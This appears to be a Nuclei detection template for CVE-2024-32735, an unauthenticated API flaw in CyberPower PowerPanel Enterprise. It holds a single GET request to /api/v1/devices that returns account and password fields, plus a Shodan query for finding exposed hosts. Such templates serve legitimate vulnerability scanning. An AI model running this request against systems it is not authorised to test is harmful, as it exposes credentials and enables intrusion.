Description
An issue regarding missing authentication for certain utilities exists in CyberPower PowerPanel Enterprise prior to v2.8.3.
An issue regarding missing authentication for certain utilities exists in CyberPower PowerPanel Enterprise prior to v2.8.3.
id: CVE-2024-32735
info:
name: CyberPower - Missing Authentication
author: DhiyaneshDK
severity: critical
description: |
An issue regarding missing authentication for certain utilities exists in CyberPower PowerPanel Enterprise prior to v2.8.3.
remediation: |
Apply the latest security patches and updates from the vendor to address this vulnerability.
impact: |
An unauthenticated remote attacker can access the PDNU REST APIs, which may result in compromise of the application.
reference:
- https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote
- https://www.tenable.com/security/research/tra-2024-14
- https://nvd.nist.gov/vuln/detail/CVE-2024-32735
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-32735
cwe-id: CWE-306
epss-score: 0.06765
epss-percentile: 0.93633
metadata:
verified: true
max-request: 1
shodan-query: html:"<title>PDNU</title>"
tags: cve,cve2024,cyberpower,auth-bupass,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/api/v1/devices"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"account":'
- '"passwd":'
- 'status":"success'
condition: and
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 200
# digest: 490a004630440220786285735c776ef7cd470f830c20250af25cc30108eaf9844a409fc09aa1fc0a0220468ee897fa29754e6c19ef25e6c726843bc505851ff5af5037191eaa53f78ec7:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.